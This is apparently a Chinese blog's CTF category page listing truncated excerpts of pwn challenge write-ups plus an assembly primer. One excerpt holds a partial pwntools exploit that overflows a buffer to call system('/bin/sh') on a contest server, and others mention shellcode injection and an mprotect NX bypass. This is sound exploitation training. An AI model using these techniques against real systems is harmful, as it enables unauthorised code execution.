分类: CTF

27 篇文章

可笑吗 我做不出pwn的时候有多慌张,它会看见吗···
pwn58 checksec 32位 IDA分析 main函数反编译失败,怀疑就是这样设计的() 就直接将就汇编进行分析 大致的函数顺序就是先logo再ctfshow函数 logo函数一如既往没东西 进ctfshow函数 ctfshow函数只有个gets函数 找遍字段没找到后门 自行传入shellcode即可 from pwn import *p …
QWQ…OWQ…OWO…0.o?
pwn54 32位程序 分析主函数 int __cdecl main(int argc, const char **argv, const char **envp){  char s1[64]; // [esp+0h] [ebp-1A0h] BYREF  char v5[256]; // […
ACECTF(ak)
!Underflow [*] 'C:\\Users\\26597\\Desktop\\exploit-me'    Arch:       amd64-64-little    RELRO:      No RELRO   &nbs…
pwn53
checksec [*] 'C:\\Users\\26597\\Desktop\\pwn53'    Arch:       i386-32-little    RELRO:      Partial RELRO    S…
青春猪头少年不会pwn掉兔女郎
pwn51 32位 反编译后傻眼了 是C++ 看不太懂,靠着string界面找到了主要函数sub_8049059 int sub_8049059(){  int v0; // eax  int v1; // eax  unsigned int v2; // eax  int v3; // eax  …
pwn?bang?bangdream!
pwn50 [*] 'C:\\Users\\26597\\Desktop\\pwn50'    Arch:       amd64-64-little    RELRO:      Partial RELRO    Sta…
pwn49
32位 NX开启 提示mprotect mprotect()函数可以修改调用进程内存页的保护属性 所以利用mprotect函数,就可以绕过NX 从而达到写入shellcode的目的 int ctfshow(){  _BYTE v1[14]; // [esp+6h] [ebp-12h] BYREF​  re…
2025青海民族大学新生赛
签到题2 exp: from pwn import *u=remote("node1.anna.nssctf.cn",28532)call_system=0x08048641bin_sh=0x0804863Apayload=b'a'*(0x64+4)+p32(call_system)+p32(0x0)+p32(bin_sh)u.sendline(p…
awp?awm?own?npw?pwn!
PWN——CTFshow pwn39 一个32位程序 Arch:       i386-32-littleRELRO:     Partial RELROStack:     No canary foundNX:         NX en…
汇编
一、汇编语言简介 汇编语言是计算机硬件与高级语言之间的桥梁,它直接操作计算机的硬件资源。在CTF的Pwn方向中,汇编语言是理解程序底层运行机制和漏洞利用的关键工具。以下内容主要基于x86和x86_64架构展开。 二、基础汇编指令 1. 数据传输指令 mov:用于数据的移动。例如:mov eax, 1          ; 将立即数1赋值给寄存器ea…